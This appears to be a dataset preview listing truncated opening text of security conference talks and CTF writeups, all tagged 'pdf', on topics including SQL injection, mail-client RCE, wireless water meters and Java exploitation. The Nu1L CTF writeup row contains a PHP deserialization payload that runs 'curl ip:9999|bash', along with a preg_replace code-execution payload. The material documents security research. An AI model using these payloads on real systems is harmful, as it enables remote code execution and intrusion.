text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
在P师傅小密圈看到了一道有意思的注入题
http://47.98.160.61/1.php?showme=1
代码如下:
1
<?php
2
if(!empty($_GET['showme']))
3
highlight_file(__FILE__);
4
$aaa=mysqli_connect("127.0.0.1","test",'test','test');
5
if(empty($_GET['id'])){
6
$id=1;
7
}else{
8
$id=$_GET['id'];
9
}
10
$clean = strtolower($id);
11
if (strpos($clean,'select') !... | pdf |
某Air客户端0click RCE分析
前⾔
某Air客户端的RCE漏洞曝出来有⼀段时间了,前⼈已经分析了如何利⽤%00截断实现双击
附件即可执⾏exe的效果。[详情⻅附件1] 本⽂就再进⼀步,借助⼀个XSS实现打开邮件即可触
发RCE。
XSS挖掘
翻了⼀下⽂件,发现客户端显示邮件的⻚⾯是⽤HTML写的,客户端调⽤cef渲染HTML。
HTML⽂件在 cmclient\app\template\readMail ⽬录中,其中 index.html 是⻚⾯内容;
readMail.html 是邮件正⽂的模板,打开邮件时客户端会依照这个模板⽣成⼀个包含邮件正⽂
的完整html⻚⾯放在 C:\Users\Administrato... | pdf |
\
I am a legend
Celine & Elie Bursztein
https://www.elie.net/hs
Celine & Elie Bursztein
I am a legend - Defcon 2014
https://www.elie.net/hs
Digital Collectible Card Game
Released by Blizzard in 2014
Based of World of Warcraft
universe
Celine & Elie Bursztein
I am a legend - Defcon 2014
https://www.elie.net/hs
Somet... | pdf |
Vulnerabilities of Wireless
Water Meter Networks
John McNabb
johnmcnabb@comcast.net
DEF CON 19
August 6, 2011
1
Background
• 13 years as an elected Water Commissioner
• 2 articles in NEWWA Journal on water infrastructure
• 10 years as lobbyist for Clean Water Action
• 6+ years as an IT Pro, mostly doing general tech s... | pdf |
Trojan-tolerant
Hardware &
Supply Chain
Security
in Practice
Who we are
Vasilios Mavroudis
Doctoral Researcher, UCL
Dan Cvrcek
CEO, Enigma Bridge
George Danezis
Professor, UCL
Petr Svenda
CTO, Enigma Bridge
Assistant Professor, MUni
Highlights
▪ HSMs & Shortcomings
▪ Existing Solutions
▪ Lessons learned from airpla... | pdf |
How to secure the keyboard
chain
DEF CON 23
Paul Amicelli - Baptiste David - CVO Esiea-Ouest
c Creative Commons 2.0 - b Attribution - n NonCommercial - a ShareAlike
1 / 25
The Talk
1. Background
2. Keyloggers forms
3. Main idea of our work
4. Details of our work
5. To go further
6. Finally.
Paul Amicelli - Baptiste Dav... | pdf |
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Java Every-days
Exploiting Software Running on 3 Billion Devices
Brian Gorenc
Manager, Vulnerability Researcher
Jasiel Spelman
Security Researcher
© Copyright 2013 Hewlett-Packard Dev... | pdf |
-Writeup
Nu1L
WEB
idid=2333flag
ssrf+sqli
fuzzsecertdownload.phpssrf
insertpayload:
gitpayload:
O:7:"Record":3:{s:4:"file";s:19:" curl ip:9999|bash ";}
$ad
sqlmap
flag
.index.php.swn upload.php unzip.sh .
zipgetshell
pregpayload
http://47.104.74.209:20005/index.php?pat=/test/e&rep=system('ls -la')&sub=jutst
test
id 1%00... | pdf |
7.27.2012
frak.redballoonsecurity.com
R E D
BALLOON
S e c u r i t y
{ Ang Cui | a@redballoonsecurity.com }
www.redballoonsecurity.com
FIRMWARE
R E V E R S E
A N A L Y S I S
K O N S O L E
W
H
O
A
M
I
W H A T D O I
D O
7.27.2012
frak.redballoonsecurity.com
a@redballoonsecurity.com
W
H
O
A
M
I
W H... | pdf |
IPv6 Primer
Gene Cronk – CISSP, NSA-IAM
SME – North American IPv6 Task Force
Systems Admin – The Robin Shepherd Group
gene@hacksonville.org
Why IPv6? Quick History
• 1992
• Internet Engineering Task Force (IETF)
• Global shortage of IPv4 addresses
• Technical limitations of IPv4
• 1993
• RFC1550 created
• 1995
• Next... | pdf |
Presentation Slides with Notes:
“Predicting Susceptibility to Social Bots on Twitter” by Chris Sumner & Dr. Randall Wald
Presented at:
Black Hat Briefings 2013 (Las Vegas, NV, USA) & DEF CON 21 (Las Vegas, NV, USA)
Slide 1
Predicting Susceptibility to
Social Bots on Twitter
Chris Sumner & Dr. Randall Wald
chri... | pdf |
DOM-XSS 漏洞的挖掘与攻击面延伸
陈思涛
北京长亭科技有限公司深圳分公司Web安全研究员
目录
DOM-XSS 挖掘与利用
DOM-XSS 常见位置
DOM-XSS 优势在哪
XSS 巧妙利用
DOM-XSS常见位置
DOM-XSS 常见位置
1、URL代入页面
这类DOM-XSS是最常见的,它的漏洞点通常是以下形式出现
DOM-XSS 常见位置
它出现的地方比较多,可能会是名称,地点,标题等等。
大多数情况下它和反射型XSS的区别不大,最大的区别是取的值不同。
此时取值时,匹配的URL是location.href,这个值包含了 location.search 和
location.hash 的值,而 location.has... | pdf |
CVE-2022-22947 SpringCloud GateWay SPEL RCE echo response
环境
git clone https://github.com/spring-cloud/spring-cloud-gateway
cd spring-cloud-gateway
git checkout v3.1.0
审计
看diff https://github.com/spring-cloud/spring-cloud-
gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e
org.springframework.cloud.gateway.suppo... | pdf |
Exploiting Continuous
Integration (CI) and
Automated Build Systems
And introducing CIDER
Whoami
• SpaceB0x
• Sr.+Security+Engineer+at+LeanKit
• Application+and+network+security+(offense+and+defense)
• I+like+breaking+in+to+systems,+building+systems,+and+learning
• Security+consultant
./agenda.sh
• Overview+of+Continu... | pdf |
Breaking Forensics Software:
Weaknesses in Critical Evidence Collection
Tim Newsham - <tim[at]isecpartners[dot]com>
Chris Palmer - <chris[at]isecpartners[dot]com>
Alex Stamos - <alex[at]isecpartners[dot]com>
iSEC Partners, Inc
115 Sansome Street, Suite 1005
San Francisco, CA 94104
http://www.isecpartners.com
July 1, 20... | pdf |
Esoteric Exfiltration
Willa Riggins
Who Am I?
Seriously, people. Does
someone know? Cause I
don’t.
● Senior Penetration
Tester @ Veracode
● FamiLAB Member
● DC407 Point of
Contact
● OWASP Orlando
Marketing
Coordinator
● BSides Orlando
Social Media Lady
● @willasaywhat on
Twitter
Exfiltration 101
What Is It?
“Da... | pdf |
pocassist浅析
author: https://github.com/Ciyfly
pocassist浅析
项目代码目录
流程图
cmd/pocassist.go 整个程序启动入口
init
RunApp
RunServer
InitAll 加载配置文件
下面是所有的配置展开
conf.Setup() 加载全局配置文件
logging.Setup() 加载日志配置文件
db.Setup() 加载db配置文件
routers.Setup() 配置web
util.Setup() 限流初始化 fasthttpclient jwt secret 初始化
rule.Setup() 规则配置相关初始化
ExecScriptHandle... | pdf |
INSECURITY ENGINEERING:
Locks, Lies, and Videotape
LOCK DESIGN:
MECHANICAL v. SECURITY ENGINEERING
¨ PRIOR DefCon PRESENTATIONS
¨ Vulnerabilities in mechanical and electro-
mechanical locks
¨ Resulted from Defective or Deficient
engineering
¨ All-encompassing standards problem
¨ Failure to understand “why” locks can be... | pdf |
sdk
0x00
0x01
0x02
1
is_root:true
2
1
2
0x03
0x04
3root
4
xposed008krealtoolsubstrate007FakeGpsmockgps
IMEI IMSIMTKNZT
5VPN
/*
*
* */
private boolean isWifiProxy(Context context) {
// 4.0
final boolean IS_ICS_OR_LATER = Build.VERSION.SDK_INT >= Build.VERSION_CODES.ICE_CREAM_SANDWICH;
String pr... | pdf |
Inceptor
Bypass AV/EDR solutions combining well known techniques
1
Copyright © 2021 Alessandro Magnosi. All rights reserved
Version 1.0
Alessandro Magnosi (@klezVirus)
Copyright © 2021 Alessandro Magnosi. All rights reserved
WhoAmI
Senior Security Noob
● Red Teamer, Code Reviewer…
What I do the most:
●
Mostly.. I spend... | pdf |
EMET 4.0 PKI MITIGATION
Neil Sikka
DefCon 21
ABOUT ME
• Security Engineer on MSRC (Microsoft Security Response Center)
• I look at 0Days
• EMET Developer
• I enjoy doing security research on my free time too:
http://neilscomputerblog.blogspot.com/
• Twitter:
@neilsikka
OVERVIEW
1.
What Is EMET?
2.
New Features in EMET ... | pdf |
Attacking The Internet of
Things
(using time)
Paul McMillan
Who am I?
There are many ways
to attack the
Internet of Things
Demo
(start)
What is a timing attack?
def authenticate_user(user, pass):
stored_hash=get_password_hash(user):
if stored_hash:
test_hash = sha1(password)
if test_hash == stored_hash:
Return True
El... | pdf |
Conducting Massive Attacks With
Open Source Distributed Computing
By Alejandro Caceres
(@DotSlashPunk)
DEF CON 21
How to (almost) get fired from your job
Step 1: Speak at a hacker con on your open source community-focused side
project (PunkSPIDER)
- Combined distributed computing (my main area of research) wit... | pdf |
群聊精华 2021.7.27-2021.8.1
@haya问:密码喷洒的密码,感觉字典是个大问题,大家有不错的这种强弱口令字典吗?
@wywwzjj:
https://github.com/r35tart/RW_Password
@L.N.:
https://github.com/berzerk0/Probable-Wordlists
https://github.com/kaonashi-passwords/Kaonashi
@haya:
https://github.com/L-codes/pwcrack-framework
@山顶洞小霸王
Windows下net accounts 命令可以查密码策略
@Astartes
密码喷... | pdf |
A New Era of SSRF - Exploiting URL Parser in
Trending Programming Languages!
Orange Tsai
Taiwan No.1
About Orange Tsai
The most professional red team in Taiwan
About Orange Tsai
The largest hacker conference in Taiwan
founded by chrO.ot
About Orange Tsai
Speaker - Speaker at several security conferences
HITCON, WooYun... | pdf |
Nu1L StarCtf Writeup
Nu1L StarCtf Writeup
Pwn
heap master
hackme
OOB
babyshell
girlfriend
quicksort
upxofcpp
blind pwn
Web
Echohub
996 Game
mywebsql
Misc
babyflash
otaku
Checkin
She
Sokoban
homebrewEvtLoop—
homebrewEvtLoop#
Reverse
Matr1x
fanoGo
yy
Obfuscating Macros II
Crypto
babyprng
babyprng2
notcurves
notfeal
Pwn
he... | pdf |
Token Kidnapping's
Revenge
Author: Cesar Cerrudo
(cesar.at.argeniss.dot.com)
Argeniss – Information Security & Software
Table of contents
Table of contents..................................................................................................................................2
Abstract............................ | pdf |
First step in the quest for manufacturing
cyber-resilient IoT devices
Panasonic Corporation
Jun Sato
Chih-Hsiang
HITCON 2020@TAIPEI
About me
・佐藤 淳
・Jun Sato
・Past experience in system development and operation
・Joined Panasonic in 2019 and involved in IoT security
・CISSP, GCFA
Background
サイバーセキュリティ戦略本部
サイバーセキュリティ2019... | pdf |
Github Security
n|u - The Open security community
Chennai Meet
Presenter : Vinothkumar
Date : 27/04/2019
About Me
Application security engineer @ Freshworks, Inc.
Blogger @ https://tutorgeeks.blogspot.com
Tweet @vinothpkumar
Github @ https://github.com/tutorgeeks
Agenda for the session
1. What is Github
2. Using Github... | pdf |
Effective InfoSec Career Planning
Beyond Job Hopping to a Real Career
Lee Kushner / Mike Murray
Lee@InfoSecLeaders.com /
Mike@InfoSecLeaders.com
2
Who Are We?
• InfoSecLeaders.com
– The best source for career guidance for information security
professionals
– A place to learn, grow, ask and share about the difficultie... | pdf |
Cloud
inSecurity
TT@chroot.org
HIT2008
Cloud
inSecurity
Who am I?
Camera man @ HITCon
Member @
Sr. Engineer @
Network
Security
Web 2.0
Security
BSD/Linux
Kernel
Firewall
Internal
IPS/IDS
Anti-SPAM
Antivirus
Programming
Network
Appliance
苦命工程師
過勞
好人 Orz
Network
Access
Control
加班
Before the Presentation
This is a trend d... | pdf |
Security Assurance Basics: Offensive Security Assurance
“Penetration Testing 101”
(mRr3b00t’s Notebook draft edition 0.3)
Author: Daniel Card
Penetration Testing
PUBLIC – Version 0.3
Copyright Xservus Limited
Page 2
Contents
Copyright ............................................................................... | pdf |
Urban Exploration
- A Hacker’s View
phreakmonkey (K.C.)
mutantMandias (Mandias)
phreakmonkey.com
Latest Slides: http://phreakmonkey.com/dc16-ue.zip
DISCLAIMER
Urban Exploration can be dangerous.
Trespassing can get you arrested, jailed, or killed.
Falling great distances can kill you.
Exposure to asbestos, ... | pdf |
RE:Trace – Applied Reverse
Engineering on OS X
Tiller Beauchamp
SAIC
David Weston
Microsoft
DTRACE BACKGROUND
What Is DTrace™?
*Dtrace was created by Sun Microsystems, Inc. and released under the Common Development and Distribution
License (CDDL), a free software license based on the Mozilla Public License (MPL).
DTr... | pdf |
前 言
《Java 开发手册》是阿里巴巴集团技术团队的集体智慧结晶和经验总结,经历了多次大规模
一线实战的检验及不断完善,公开到业界后,众多社区开发者踊跃参与,共同打磨完善,系统化地
整理成册。现代软件行业的高速发展对开发者的综合素质要求越来越高,因为不仅是编程知识点,
其它维度的知识点也会影响到软件的最终交付质量。比如:数据库的表结构和索引设计缺陷可能带
来软件上的架构缺陷或性能风险;工程结构混乱导致后续维护艰难;没有鉴权的漏洞代码易被黑客
攻击等等。所以本手册以 Java 开发者为中心视角,划分为编程规约、异常日志、单元测试、安全规
约、MySQL 数据库、工程结构、设计规约七个维度,再根据内容特征,细分成若干二级子目录。
另... | pdf |
By Lawrence Baldwin & Jaeson Schultz
“Extreme IP Backtracing”
I've been attacked… now what?
The reality is that few attacks are launched directly from an
attacker's system since they know they would be easily
caught using standard backtracing methods.
The Internet is chock full
of insecure systems which
are easily ... | pdf |
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I
I cd
cd /home/
/home/tjmunn
tjmunn/.loop
/.loop
I
I insmod
insmod -... | pdf |
Covert Post-Exploitation Forensics With Metasploit
Tools and Examples
R. Wesley McGrew
wesley@mcgrewsecurity.com http://mcgrewsecurity.com
Mississippi State University
National Forensics Training Center
http://msu-nftc.org
Introduction
In digital forensics, most examinations take place after the hardware has been phys... | pdf |
Evolution of iOS Data Protection and
iPhone Forensics:
from iPhone OS to iOS 5
Andrey Belenko & Dmitry Sklyarov
Elcomsoft Co. Ltd.
1
Agenda
• Basics
• iOS Security before iOS 4
• iOS 4 Data Protection
• iOS 5 Data Protection Changes
• Summary
2
Forensics 101
Acquisition ➜ Analysis ➜ Reporting
GOALS:
1.
Assuming
... | pdf |
对Bypass AMSI混淆篇中的代码浅析
L.N.师傅在最后给出了我一个代码,然而我发现我根本看不懂。虽然拿来就用确
实很爽,但是换个场景,过段时间或许就不可行了。于是学习了一下下面这段
代码到底在干吗。看了一下觉得关键代码是 $c=[string](0..37|%{[char]
[int](29+($a+$b).substring(($_*2),2))})-replace " " 于是对这串代
码做学习
# 0x01 代码解析
要弄懂的就是下面这几个问题:
1.0..37|%{}:其实这个感觉猜也能猜出来,循环的一种写法,循环38次
2. $_ 是个啥?说实话一开始我也弄不明白这到底是什么写法,后来直接就是在
powersh... | pdf |
Metasploit 基础知识
整理此文档,纯粹出于兴趣爱好,如果有涉及版权的问题,请联系原文档的作者.
由于本人能力有限,文档中难免会有些错误,欢迎大家来信指正.
[原文]http://www.offensive-security.com/metasploit-unleashed/
Metasploit 基础知识
Metasploit 框架提供了多种不同的接口,每个接口都有自己的优势与不足。尽管如此,目前仍
没有一个很好的接口用于使用 MSF(尽管 msfconsole 能够访问 Metasploit 的众多特性)。当
然,了解熟悉 MSF 提供的所有接口,多工作还是很有效的。
Msfcli
Msfcli 为 fra... | pdf |
Grendel Scan
Grendel-Scan
Distribution
Written entirely in Java
Written entirely in Java
Uses Eclipse’s Standard Widget Toolkit (SWT)
Windows, Linux and Mac builds
Only requirement is JRE 1.5 or later
Primary Libraries
Apache HTTP Components - http://hc apache org/
Apache HTTP Components http://hc.apache.org/
H... | pdf |
@Y4tacker
Enjoy模板引擎分析
前置
⾸先有关Enjoy模板引擎的⼀些描述可以看这⾥:https://jfinal.com/doc/6-1
⽂档中值得关注的点
属性访问触发get⽅法
在官⽅⽂档⾥⾯我们可以看到很多有趣的东西(当然我会更关注于⼀些相关的),⽐如属性访问
的这⼀条描述,可以让我们去触发对象的get⽅法(前提是public修饰)
⽅法调⽤
由于模板引擎的属性取值表达式极为常⽤,所以对其在⽤户体验上进⾏了符合直觉的扩展,field 表
达式取值优先次序,以 user.name 为例:
如果 user.getName() 存在,则优先调⽤
如果 user 具有 public 修饰过的name 属性,则取 ... | pdf |
IOActive, Inc. Copyright ©2014. All Rights Reserved.
Weird-Machine Motivated Practical
Page Table Shellcode & Finding
Out What's Running on Your
System
Shane Macaulay
Director of Cloud Services
IOActive, Inc. Copyright ©2014. All Rights Reserved.
Killing the Rootkit! And how to find
everything running on yo... | pdf |
Outsmarting the Smart City
DISCOVERING AND ATTACKING THE TECHNOLOGY THAT RUNS
MODERN CITIES
&
2
Page
Researcher Bios
• Daniel Crowley
• Research Baron at IBM X-Force Red
• Pen tester since 2004
• Locksport enthusiast and past competition winner
• Actually holds the title of Baron (in Sealand)
3
Page
Researcher Bios
• ... | pdf |
Pwn the Pwn Plug:
Analyzing and Counter-Attacking
Attacker-Implanted Devices
Wesley McGrew
Assistant Research Professor
Mississippi State University
Center for Computer Security Research
McGrew Security
wesley@mcgrewsecurity.com
Introduction
•Wesley McGrew
•Breaking things, RE, forensics, etc.
•Finally finished disserta... | pdf |
Open in 30 Seconds
Cracking One of the
Most Secure Locks in America
Marc Weber Tobias
Matt Fiddler
LOCKS, LIES, and “HIGH”
INSECURITY
• Dominant high security lock maker
• 40 year history of security
• Many expert attempts to crack with limited
success, complicated tools
• Misstatements and disinformation
• 18 month re... | pdf |
30-Jun-08
Defcon16 2008
1
Open Source Warfare
Origins
Use
Transformations
Day Three: Sunday, August 10
10:30 am
Track 3
30-Jun-08
Defcon16 2008
2
…Oh my….
What is Asymmetric Warfare
•Is it purely defensive
•Does it rely on traditional
concepts
•How does an established fighting
group use it
•Does it overlap with other... | pdf |
Exploitations of XNU Port Type Confusions
Tielei Wang
The background
Background of the talk
iOS 14.2, released on Nov 5,
2020, fixed an in-the-wild exploit
reported by Google Project 0.
First in-the-wild exploit since iOS 14 (?)
Safari RCE (CVE-2020-27930)
kernel info leak (CVE-2020-27950)
kernel type confusion (CVE-2... | pdf |
Abusing Bleeding Edge Web
Standards for AppSec Glory
Bryant Zadegan
Ryan Lester
Advisor/Mentor
CEO, Co-Founder
Mach37
Cyph
keybase.io/bryant
hacker@linux.com
@eganist
@TheRyanLester
• Does AppSec stuff,
usually.
• Mentors security
startups, sometimes.
• “Mentors” others on
AppSec, occasionally.
• Paid a buck to mak... | pdf |
2020年RSAC关键热点
DevSecOps左移开发安全
思路分享
2
安全圈的奥斯卡已开幕
RSAC已在美国当地时间2月24日—28日开启
RSA大会是信息安全界最有影响力的业界盛会之一。RSA大会一年一度分别在美国、欧洲和日本
举办,其议程设计由信息安全从业者及其它相关专业人士评判和制定。RSA大会一直吸引着世界
上最优秀的信息安全人士,创造机会让参会者跟同辈和杰出人物、跟新兴企业和知名企业直接交
流,了解信息安全的最重要课题。
3
聊些八卦
✓ 外国友人想请你喝一杯的时候要三思
如果你有朋友或同事是第一次参与!
✓ 不在非授权情况下接受外媒采访
4
一起来认识RSA
RSA 大会是信息安全界最有影响力的业界盛会之一
一、那它... | pdf |
⼜到了提笔写年终总结的时候,和以前拼命想记录⽣活状态不同,这次我却不知道从哪开始写起。就想到啥写啥
吧。
北京
今年年初来到了北京,没有了昔⽇了朋友,在北京还是很孤独的。跨年夜我和⼥朋友吃完晚饭,说想找个地⽅⼀起
跨年,竟然发现没有什么好去的地⽅。想到三⾥屯离我们最近,那边应该好玩,打开打⻋软件发现附近堵⻋已经堵
了⼏条街了,瞬间打消了去意,想买点东⻄回家吃,但是已经快10点,附近超市什么的都关⻔了,也想不到买点
啥,就这样两⼿空空回到出租屋和好友们在游戏中度过了跨年的钟声。
Hacking8安全信息流
写总结第⼆个想到的就是总结⼀下hacking8,这是我今年花费时间最多的⼀个东⻄,我得好好总结下,从去年五
⽉⼀号写第⼀⾏代码到现... | pdf |
java.io.ObjectInputStream 反序列化分析 -…
Skay
这⾥主要参考了李三师傅的⽂章 http://redteam.today/2020/02/14/Java%E5%8E%9F%E
7%94%9F%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%B
A%8F%E5%88%97%E5%8C%96%E4%BB%A3%E7%A0%81%E7%AE%80%E8%A6%8
1%E5%88%86%E6%9E%90/ 膜膜膜
感觉看了⽂章⼀下⼦明⽩了好多,当然还有好很多疑问
图镇楼
(1) ⾸先起⼀个Demo调试环境
被序列化的类
/**
1
我们的序列化和反序列化⽅法
... | pdf |
Advisory.
New Sandworm malware
Cyclops Blink replaces
VPNFilter
Version 1.0
23 February 2022
© Crown Copyright 2022
New Sandworm malware Cyclops Blink
replaces VPNFilter
The Sandworm actor, which the UK and US have previously attributed to
the Russian GRU, has replaced the exposed VPNFilter malware with a n... | pdf |
腾讯 WAF 挑战赛回忆录
by do9gy
Part 0
应各位好友诚挚邀请,分享一下 WAF Bypass 相关的技巧。其实本来应该在比赛结束就
跟大家分享,无奈于 TSRC 那边对各位师傅提交的 Bypass 尚未统一修复,一直推迟到今日。
本文披露的相关技术信息已经得到 TSRC 有关方面的许可,且隐藏了相关 POC 的内容,只
分享技术原理及绕过思路,希望能够起到抛砖引玉的作用。
首先谈一下 WAF。Web 应用防火墙,主要用途是对 HTTP(s)协议进行校验,拦截恶
意的攻击请求,放行正常的业务请求。从架构来看,主要分为:网络层、应用层、云 WAF 三
类。从绕过来看,分为通用型绕过和单一规则绕过。通用型... | pdf |
0x00
asciijava
p
2014https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
ſ //S
ı //I
K //k
p
2014javascriptjava
0x01
FILE:///ETC/PASSWD
java
javabean
org.apache.commons.beanutils.BeanUtils
formField
person
Sex
ſ s
0x02
javabean | pdf |
Investigating the Practicality
and Cost of Abusing
Memory Errors with DNS
Project Bitfl1p by Luke Young
$ whoami
Undergraduate Student - Sophomore
Founder of Hydrant Labs LLC
This presentation is based upon research conducted as a employee of
Hydrant Labs LLC and was not supported or authorized by any previous,
cu... | pdf |
Intelligence Gathering
DefCon X
Vic Vandal
vvandal@well.com
NECESSARY DISCLAIMER:
This talk discusses various illegal techniques and concepts.
The author does not endorse nor does he condone the
execution of any of those illegal activities discussed.
ESPECIALLY the Information Warfare concepts.
Types of Intelligence G... | pdf |
The Minimum Elements
For a Software Bill of Materials (SBOM)
Pursuant to
Executive Order 14028
on Improving the Nation’s Cybersecurity
The United States Department of Commerce
July 12, 2021
Department of Commerce
The Minimum Elements for an SBOM
2
Table of Contents
Table of Contents ........................... | pdf |
NISRA
◎ 王薪嘉
◎ 現任 NISRA 會長
2
◎ 靜態
• 只能瀏覽資料 (純粹圖文)
• Html + CSS
◎ 動態
• 用戶端與伺服器可以互動
• Ex: 投票系統、檔案上傳、購物網站, etc
• PHP, JSP, ASP, etc
上傳
伺服器
顯示
user
user
user
程式
資料庫
php asp
上傳
上傳
伺服器
伺服器
顯示
輸入&產生
user
user
user
user
user
user
資料隱碼攻擊
◎ Structured Query Language,一般習慣唸成
"sequel",不過正確的唸法應該是 "S-Q-L"
◎ 是一種常見於資料庫的語言,用於資料存取、查詢、
更新和... | pdf |
Consumer
Automotive
Technology
Retail
Life Sciences & Healthcare
Energy & Chemicals
Uroburos
Paul Rascagneres
Senior Threat Researcher
GDATA SecurityLabs
Page
Uroburos | HITCON | August 2014
Uroburos is a rookit revealed to the public by G DATA in February 2014. The purpose of the
rootkit is to maintain re... | pdf |
The future frontier of Hacking - UMTS mobile phone platform
Web intrusions: the best indicator of the vulnerable status of the Internet
Speaker: SyS64738 www.zone-h.org
Zone-H.org
Zone-H.org
Zone-H.org: the Internet thermometer?
Zone-H.org
SECURE
HACKABLE
F#CKABLE
Digital attacks amount since 2002
1600
1811 2341
365... | pdf |
WPA TOO !
Md Sohail Ahmad
AirTight Networks
www.airtightnetworks.com
About the Speaker
2007, Toorcon9
2009, Defcon 17
2008, Defcon 16
Caffe Latte Attack
Autoimmunity
Disorder in
Wireless LANs
WiFish Finder: Who
will bite the bait?
2010, Defcon 18
WPA TOO !
Defcon 18
WPA2 is vulnerable under certain conditions. This ... | pdf |
封面
书名
版权
前言
目录
第一部分 准备工作
第1 章 熟悉工作环境和相关工具
1 . 1 调试工具Mi c r o s o f t V i s u a l C + + 6 . 0 和O l l y D B G
1 . 2 反汇编静态分析工具I D A
1 . 3 反汇编引擎的工作原理
1 . 4 本章小结
第二部分C + + 反汇编揭秘
第2 章 基本数据类型的表现形式
2 . 1 整数类型
2 . 1 . 1 无符号整数
2 . 1 . 2 有符号整数
2 . 2 浮点数类型
2 . 2 . 1 浮点数的编码方式
2 . 2 . 2 基本的浮点数指令
2 . 3 字符和字符串
2 . 3 . 1 字符的编码
2 ... | pdf |
django 写bugbounty平台
登陆⻚⾯
登陆后
点击“项⽬”
新增/修改项⽬
项⽬概览
点击任意项⽬后进⼊项⽬概览,这⾥修改了 django 的路由以及新增了⾃⼰的⻚⾯,⽬前是该项⽬的 DNS 展示。 | pdf |
Insecure.Org
Insecure.Org
Nmap: Scanning the Internet
by Fyodor
Black Hat Briefings USA – August 6, 2008; 10AM
Defcon 16 – August 8, 2008; 4PM
Insecure.Org
Insecure.Org
Abstract
The Nmap Security Scanner was built to efficiently
scan large networks, but Nmap's author Fyodor has
taken this to a new level by scanning m... | pdf |
java反序列化基础知识总结
java的类加载过程
1. 首先是调用 public Class<?> loadClass(String name) 方法,通过public方法调用保护方法
protected Class<?> loadClass(String name, boolean resolve)
2. 在 protected loadClass 方法中,第400行会调用一个 findLoadedClass 方法判断当前类是否已
经加载。如果类已经加载,直接返回当前类的类对象。
3. 如果创建当前 ClassLoader 时传入了父类加载器( new ClassLoader (父类加载器))就使用父类加载
器加载 Test... | pdf |
{
Breaking the x86 ISA
domas / @xoreaxeaxeax / DEF CON 2017
Christopher Domas
Cyber Security Researcher @
Battelle Memorial Institute
./bio
We don’t trust software.
We audit it
We reverse it
We break it
We sandbox it
Trust.
But the processor itself?
We blindly trust
Trust.
Why?
Hardware has
all the same prob... | pdf |
Advances in Linux
process forensics
with ECFS
Quick history
● Wanted to design a process snapshot
format native to VMA Vudu
● http://www.bitlackeys.org/#vmavudu
● ECFS proved useful for other projects as
well
Problem space
A process address space is complex with
many components
➢
ELF binary format (structural n... | pdf |
XSS Bypass Cookbook ver 3.0
XSS Bypass Cookbook
[+] Author: math1as
[+] Team: L team
#1 引言
在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。
因此也引发了不少安全爱好者和专业工程师的研究。
而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。
而且不同xss向量也因为浏览器的特性会有所区别
比如chrome在加载资源时会校验服务器返回的mimeType
而firefox则根据标签自己设定的type来做出处理
本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过
相... | pdf |
This document and its content is the property of Airbus Defence and Space.
It shall not be communicated to any third party without the owner’s written consent. All rights reserved.
CANSPY
a Platform for Auditing CAN Devices
Arnaud Lebrun
Jonathan-Christofer Demay
2
Arnaud Lebrun
Jonathan-Christofer Demay
CANSP... | pdf |
Managing Your Own Security Career
Mike Murray & Lee Kushner
mmurray@episteme.ca Lee@LJKushner.com
How to be happy, challenged and well-compensated
Who Are We?
✴ Lee Kushner
✴ Over 10 years of Success Recruitment of Information Security Professionals
✴ Founder and CEO of the Leading Information Security Recruitm... | pdf |
洞态IAST与黑盒、白盒
共建DevSecOps
01
02目录
1> IAST检测原理
2> 洞态IAST架构设计
3> 灰盒、黑盒、白盒共建DevSecOps
4> 部署与落地
IAST检测原理
03
03 IAST检测原理
IAST(Interactive AST,交互式扫描器)高频、高效、无脏数据
应用运行
态分析
污点跟
踪算法
准确率高
效率高
无脏数据*
原理
效果
覆盖度完整
03 IAST检测原理 污点跟踪算法
不可信数据采集
不可信数据预处理
不可信数据传播图
数据调用链路查找
decode
id
_jspService
put
id
id
getParameter
exec
cmd->id
decod... | pdf |
最近在研究关于聊天软件的一些信息获取。
对于微信来说获取个人信息就是读取内存中的字符串,这些字符包括电话、数据库key、username、
wxid等等,但是微信不同的版本字符串在内存中的位置不一样,也就是偏移不一样,看之前的 BIOPASS
RAT ,它的微信模块定位使用版本号,不同版本号的偏移不一样。
艹老师说这种方式太麻烦了,微信每更新一个版本就得更新偏移。于是,我研究了根据微信特定数据结
构定位的方式,这种方式可以全版本通用。
定位
因为我的主要目的是获取数据库的key,通过看雪的这篇文章
https://bbs.pediy.com/thread-251303.htm
可以得到我的key
地址是 14DA32A0
打开... | pdf |
defcon xv
defcon xv
hacker culture
around
the (corporate)
world
hacker culture
around
the (corporate)
world
luiz eduardo
luiz eduardo
defcon xv
defcon xv
hi
hi
… networking guy
… security guy
… works for mu security
… wlan at security cons
… regular speaker at security
cons
… defcon networking goon
… founder o... | pdf |
命令执行无回显的判断方法及 dnslog 相关例题
一、命令执行判断
命令执行可能会存在命令执行完没有回显,首先要判断命令
是否有执行,可以通过三种方式来判断:延时、HTTP 请求、
DNS 请求。
1、
延时:
无延时无回显
有延时无回显
通过是否延时来判断该条命令是否有执行,有延时则代表命
令有执行。(”sleep 3”表示延时 3 秒)
2、
HTTP 请求:目标机通过向公网可通信的机子发起 http
请求,而这个公网可通信的机子是我们可控的,则当该公
网机子收到 http 请求就代表命令有执行。
例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,
当目标机”curl 公网机 ip:端口号”的时候,公网机的该端口... | pdf |
1. 前言
昨晚看到朋友圈推了个和裸聊诈骗斗智斗勇的视频,点进去一看感觉和上个月搞得一个站的后台很像,
所以想上去看一下,结果网站关了,就通过fofa重新搜了一个存活的网站,发现确实很像。
于是就有了这篇文章,由于很多都是后补的图,可能不是很完整,见谅。
2. 第一次shell
由于上次拿到目标的时候就给了一个域名,所以先浏览一下看看,常规的扫一下目录。
发现存在 uploads , temp , tmp 这几个看起来很像上传文件的目录,而且有 file.php 这个文件,然后发
